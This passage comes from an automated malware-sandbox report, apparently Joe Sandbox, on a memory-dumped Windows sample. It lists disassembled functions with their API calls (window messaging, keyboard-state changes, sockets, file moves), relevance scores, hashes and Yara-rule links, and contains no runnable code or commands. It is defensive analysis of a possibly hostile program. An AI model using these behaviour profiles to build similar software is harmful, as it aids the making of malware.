                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                        • Opcode ID: d872c7acf3e2d9dbc9bb11709cdf01d124080eb6a92da98b5a32df6097bbc962
                                                                                                                                                                                                                                                                                        • Instruction ID: 8333d9410c0a5ad502273364406a9b32ec34bceeffae99af3cabb1414a111c8c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d872c7acf3e2d9dbc9bb11709cdf01d124080eb6a92da98b5a32df6097bbc962
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91910771D0021DEBDF10EFA4DC81AEEB7B8BF08714F10456AE915A7291DB749A44EF60
                                                                                                                                                                                                                                                                                        Function 00F92B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenu.USER32(?), ref: 00F92C1F
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00F92C51
                                                                                                                                                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F92C79
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F92CAF
                                                                                                                                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00F92CE9
                                                                                                                                                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00F92CF7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F643AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetCurrentThreadId.KERNEL32 ref: 00F643B4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F62F00), ref: 00F643BB
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F92D7F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6F292: Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3bdce1525412c485fc7fc6be3573abd7a872f0bb8d0f799852d16c3e42b7925d
                                                                                                                                                                                                                                                                                        • Instruction ID: 377c8b16d98eab6241827801199560bc25f27aca837154052499f63266fe9585
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bdce1525412c485fc7fc6be3573abd7a872f0bb8d0f799852d16c3e42b7925d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49718D76E00215AFDF50EF64D885AAEB7F1EF48320F148459E816EB351DB34AE41AB90
                                                                                                                                                                                                                                                                                        Function 00F988F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00F98992
                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00F9899E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F98A79
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00F98AAC
                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 00F98AE4
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00F98B06
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F98B1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6ac8bca3aea29f1c19ef511304145a20f28a496fa21256694b28ed736d5669ed
                                                                                                                                                                                                                                                                                        • Instruction ID: 2ff6b3f29e9f15009cb3abe962a2fb3b0a21dee528f14e1e8df0af4a6af9e622
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ac8bca3aea29f1c19ef511304145a20f28a496fa21256694b28ed736d5669ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F718F74A00208AFFF259F64C884FBA7BB5FF5A3A0F14045AE84567261CB35AD42FB51
                                                                                                                                                                                                                                                                                        Function 00F6B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 00F6B8C0
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6B8D5
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00F6B936
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F6B964
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6B983
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F6B9C4
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F6B9E7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3f3da700ff2adb23d217a9f1c177c077ee1d21008dcd001f1b9b86b83a83c651
                                                                                                                                                                                                                                                                                        • Instruction ID: 063089d6324fd81c2200b3100ddfefdcf4850ee25df555eaf65f8f2e1d6c13ed
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f3da700ff2adb23d217a9f1c177c077ee1d21008dcd001f1b9b86b83a83c651
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A051EFA0A487D53EFB364334CC45BBABEA95F46714F088489E2D5868D2D3E8ACC4F750
                                                                                                                                                                                                                                                                                        Function 00F6B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetParent.USER32(00000000), ref: 00F6B6E0
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6B6F5
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00F6B756
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F6B782
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F6B79F
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F6B7DE
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F6B7FF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a864c69423b030013f7734edba5d9fb356814ffd32e2d69e9e5353eaffdf772
                                                                                                                                                                                                                                                                                        • Instruction ID: 98712a44a525097789c432958ab6c87a891270c2572fb3b83fc03ca588f32b85
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a864c69423b030013f7734edba5d9fb356814ffd32e2d69e9e5353eaffdf772
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E51DFA0D486D53EFB328334CC55B7ABEA95B46314F0C8599E0D98A8D2D394ECC9FB50
                                                                                                                                                                                                                                                                                        Function 00F357A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00F35F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00F357E3
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00F3585E
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00F35879
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00F3589F
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,00F35F16,00000000,?,?,?,?,?,?,?,?,?,00F35F16,?), ref: 00F358BE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00F35F16,00000000,?,?,?,?,?,?,?,?,?,00F35F16,?), ref: 00F358F7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d3f3f9f048f4bad2d565fd01e40b38a8b1ce5565a7efac5915535c6ed659127c
                                                                                                                                                                                                                                                                                        • Instruction ID: 0b30e0c556e73c1aac1f8d8d4975524147503a34e652d46a299c55107aee0d1b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3f3f9f048f4bad2d565fd01e40b38a8b1ce5565a7efac5915535c6ed659127c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51C1B1E01648EFDB10CFA8D881BEEBBF8EF48720F14411AE955E7291D7309941DB60
                                                                                                                                                                                                                                                                                        Function 00F23090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F230BB
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00F230C3
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F23151
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F2317C
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F231D1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 64149d305219c9622cf889745eec00a6e5e39b23029da48bbf6c01736088134a
                                                                                                                                                                                                                                                                                        • Instruction ID: a595a6e0a63a7272113210741784d6d7141b38afff5ad0c7fba884aec636c39b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64149d305219c9622cf889745eec00a6e5e39b23029da48bbf6c01736088134a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B41E6B4E002289BCF10DF68EC81BAEBBB5BF44324F148155E8156B392D739DB11EB91
                                                                                                                                                                                                                                                                                        Function 00F81B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F83AD7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: _wcslen.LIBCMT ref: 00F83AF8
                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F81B6F
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F81B7E
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F81C26
                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00F81C56
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f7c3ccdc4b5fd6b9dd44fecb2ebc848d3a9b5eeb8cd95e3dcaccc8c1f05f365c
                                                                                                                                                                                                                                                                                        • Instruction ID: 42f9a22cc32ec302403ecf5f9de0dd8a9c492644ead4490c55a25439b2acc66a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7c3ccdc4b5fd6b9dd44fecb2ebc848d3a9b5eeb8cd95e3dcaccc8c1f05f365c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3441D471600108AFDB10AF64C845BE9BBEDFF85324F148159F8059B292D774ED42EBE1
                                                                                                                                                                                                                                                                                        Function 00F6D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6D7CD,?), ref: 00F6E714
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6D7CD,?), ref: 00F6E72D
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F6D7F0
                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F6D82A
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6D8B0
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6D8C6
                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00F6D90C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                        • Opcode ID: 0f9b92aa615f46c8187a71b10e1340f87428cf6a26276aa1fd6e2e62678e8347
                                                                                                                                                                                                                                                                                        • Instruction ID: 165abd543bc9c653f469f6ff9c119c4a2b8ff6eeb03369535b86edb8b7b76918
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f9b92aa615f46c8187a71b10e1340f87428cf6a26276aa1fd6e2e62678e8347
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3416675D0521C9EDF12EBA4DD85FDE77B8AF08340F1000EAA505EB141EB79A788EB50
                                                                                                                                                                                                                                                                                        Function 00F93899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F938B8
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F938EB
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F93920
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F93952
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F9397C
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F9398D
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F939A7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ca538f8ec314dc2f868a710c27dd3b8f3b15e5a5e163829e6061cacc1fe04fd9
                                                                                                                                                                                                                                                                                        • Instruction ID: edef2a582aec88e8e0f4127e918712866381172572f9ed83daf4be0b824ffe2e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca538f8ec314dc2f868a710c27dd3b8f3b15e5a5e163829e6061cacc1fe04fd9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50313531A05259AFEF21CF59DC94F6437A2FB8A720F1401A5F5108B2B1CB71A944FB42
                                                                                                                                                                                                                                                                                        Function 00F6808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F680D0
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F680F6
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F680F9
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F68117
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F68120
                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F68145
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F68153
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 38c64028de4d88909c768672189f59abada233414a674a50fa4310715a537916
                                                                                                                                                                                                                                                                                        • Instruction ID: 4102941a18b2c16a262054a108cfca9b13346d8edb156e5562b4109776c9b23d
